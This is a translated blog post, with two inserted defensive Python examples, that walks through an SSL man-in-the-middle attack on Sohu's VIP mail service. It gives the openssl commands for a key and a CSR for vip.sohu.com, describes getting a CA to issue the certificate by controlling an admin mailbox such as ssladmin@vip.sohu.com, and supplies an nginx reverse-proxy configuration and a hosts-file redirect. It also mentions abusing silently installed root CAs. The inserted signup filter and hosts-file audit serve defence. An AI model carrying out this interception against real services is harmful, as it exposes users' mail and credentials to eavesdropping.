What we bring to you today is a successful example of an SSL eavesdropping attack, taken from theory to practice.
The important thing about SSL eavesdropping is that you need a valid SSL certificate, and the name on the certificate must be the same as the domain name of the attacked website.
At present all the major CAs sell low-priced SSL certificates; the cheapest cost less than 10 US dollars, and some domain registrars even buy these certificates in bulk and give you one free of charge when you register a domain name.
For a low-priced domain-validated SSL certificate the CA has only one requirement: you must control a specific mailbox at that domain name. When the CA sends a confirmation email to that mailbox, you click approve and that is it.
So the key to the problem is how to intercept the confirmation email. I believe some organizations have a way to do this.
Of course, there is a simpler way: a lot of software in China will quietly install its own root CA on your computer. The Windows security mechanism allows this import into the root CA store without any confirmation or prompt, and Microsoft even provides a dedicated small program for importing certificates. As long as you find one of these software vendors, you can generate any certificate you like, and it will be treated as valid with no warning at all.
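The mailbox-approval step above is what makes a public mail provider dangerous when its own domain can appear in a certificate. As an added defender-side example (not code from the original post), here is a signup check such a provider could run, refusing the local parts that CAs accept as proof of domain control. The five standard names are admin, administrator, webmaster, hostmaster and postmaster; the extra names and the normalization rules are assumptions for this example.

```python
import unicodedata

# Local parts CAs accept as proof of domain control when sending the
# confirmation email (admin, administrator, webmaster, hostmaster,
# postmaster). The remaining names are an assumption for this example,
# standing in for the "administrator-related" list the post's CA offers.
CA_VALIDATION_LOCALPARTS = frozenset({
    "admin", "administrator", "webmaster", "hostmaster", "postmaster",
    "ssladmin", "sslwebmaster", "root", "security", "abuse", "noc",
})


def normalize_localpart(local: str, dots_insignificant: bool = True) -> str:
    """Fold the tricks a registrant could use to obtain a look-alike name.

    NFKC maps full-width letters to ASCII, casefold removes case, the
    +tag suffix is dropped (admin+x@ delivers to admin@ on many providers)
    and, if the provider ignores dots, so is every dot (ad.min@ == admin@).
    """
    local = unicodedata.normalize("NFKC", local).casefold().strip()
    local = local.split("+", 1)[0]
    if dots_insignificant:
        local = local.replace(".", "")
    return local


def is_reserved_for_validation(address: str) -> bool:
    """True if letting a user register this address would let them pass
    a CA's email-based domain validation for the provider's own domain."""
    if "@" not in address:
        raise ValueError("not an email address: %r" % address)
    local, _domain = address.rsplit("@", 1)
    return normalize_localpart(local) in CA_VALIDATION_LOCALPARTS


def filter_signups(requested_addresses):
    """Split signup requests into (allowed, refused) lists."""
    allowed, refused = [], []
    for addr in requested_addresses:
        (refused if is_reserved_for_validation(addr) else allowed).append(addr)
    return allowed, refused
```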
Enough talk, let's get to work. Here Sohu's VIP mailbox is used as the example (it supports SSL throughout the whole session). First generate the key and CSR for vip.sohu.com.
sam@bra:~$ mkdir ssltest
sam@bra:~$ cd ssltest
sam@bra:~/ssltest$ openssl genrsa -out vip.sohu.com.key 1024
Generating RSA private key, 1024 bit long modulus
...
...
e is 65537 (0x10001)
sam@bra:~/ssltest$ openssl req -new -key vip.sohu.com.key -out vip.sohu.com.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Beijing
Locality Name (eg, city) []:Beijing
Organization Name (eg, company) [Internet Widgits Pty Ltd]:fake Sohu
Organizational Unit Name (eg, section) []:fake
Common Name (eg, YOUR name) []:vip.sohu.com
Email Address []:ssladmin@vip.sohu.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Now we have a certificate request for vip.sohu.com; next we submit this request to the CA for issuance.
[Image: sslhijack1]
The system then shows you a whole list of administrator-type email addresses at the domain and waits for you to select one.
[Image: sslhijack2]
After you select one, the CA sends a confirmation email to the selected address containing a link. Open the link, and you will be asked to confirm... hey, the certificate is ready.
[Image: sslhijack3]
[Image: sslhijack4]
[Image: sslhijack5]
[Image: sslhijack6]
Save the issued certificate, modify the nginx configuration file, add the certificate, and set up a reverse proxy to vip.sohu.com. It looks like the following:
# HTTPS server
#
server {
    listen 443;
    server_name vip.sohu.com;
    ssl on;
    ssl_certificate sslkeys/vip.sohu.com.crt;
    ssl_certificate_key sslkeys/vip.sohu.com.key;
    ssl_session_timeout 5m;
    ssl_protocols SSLv2 SSLv3 TLSv1;
    ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
    ssl_prefer_server_ciphers on;
    location / {
        proxy_pass https://vip.sohu.com;
    }
}
Save and restart nginx. Then modify the hosts file on the local machine so that vip.sohu.com points at the nginx server:
127.0.0.1 vip.sohu.com
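The hosts-file entry is the one local trace this setup leaves, so it is also the easiest thing to check for. As an added example (not part of the original post), here is a small audit that parses hosts-file content and reports public-looking names sent to loopback, private or link-local addresses; the sample content and the list of internal top-level labels are constructed for this example.

```python
import ipaddress

# Names that legitimately resolve to loopback and are not an indicator.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
               "ip6-loopback", "broadcasthost"}
# Last labels of internal/reserved names; these are never public sites.
# The list is an assumption for this example.
INTERNAL_TLDS = {"local", "localhost", "localdomain", "example", "internal",
                 "corp", "lan", "home", "test", "invalid"}
# Constructed hosts-file content; the last entry is the kind of override
# the post adds so that vip.sohu.com reaches the local nginx proxy.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
192.168.1.20    build-box.corp.example   # internal machine, fine
127.0.0.1       vip.sohu.com
"""

def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; skip comments and malformed lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            yield ip, name.lower()

def looks_public(hostname):
    """Heuristic: a dotted name whose last label is not an internal TLD."""
    labels = hostname.split(".")
    return len(labels) >= 2 and labels[-1] not in INTERNAL_TLDS

def find_overrides(text):
    """Return [(ip, hostname)] for entries that send a public-looking name to
    a loopback, private or link-local address: the browser then talks to a
    local proxy while the address bar still shows the real domain."""
    suspicious = []
    for ip, name in parse_hosts(text):
        if name in LOCAL_NAMES or not looks_public(name):
            continue
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            suspicious.append((str(ip), name))
    return suspicious
```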
Open your browser, enter https://vip.sohu.com, and you will find... no error or warning at all! In other words, the SSL certificate has been replaced successfully, and from then on everything you transmit is hijacked.
In tests, colleagues using IE, Firefox, Safari and other browsers all said they noticed nothing about the certificate replacement; the browsers fully accepted the replaced certificate and even presented the hijacked website as a highly trustworthy one.
Let's go back and briefly explain this process: a user accesses a website, but a proxy has been inserted in the middle. The proxy uses a real, highly trusted certificate to exchange data with the user, so the user talks to the proxy over an SSL-encrypted channel. When the data arrives at the proxy it is decrypted and logged for analysis. The proxy then forwards the request to the website server, again over SSL. The website server has no idea any of this is happening: it only ever sees requests sent by the proxy. But the proxy is not the end user, and by then the data has already been monitored and analyzed.
Finally, a word: do not be infatuated with SSL. SSL is just a legend.
Note:
1. If you reprint this, please cite the source: http://wuhongsheng.com/it/2009/09/ssl-hijack/
2. Friends at Sohu, please don't come looking for trouble or chase me across provinces. I chose you because you are too secure and support SSL access to email.
3. If you have time, please pay more attention to my DNSPod. DNSPod is recruiting at the moment and it is hard to find people... please help spread the word and introduce some talent:
https://www.dnspod.com/About/Jobs
The first figure below shows Sohu's original certificate; the second and those after it show the replaced certificate.
[Image: sslhijack7]
[Image: sslhijack8]
[Image: sslhijack9]
[Image: sslhijack10]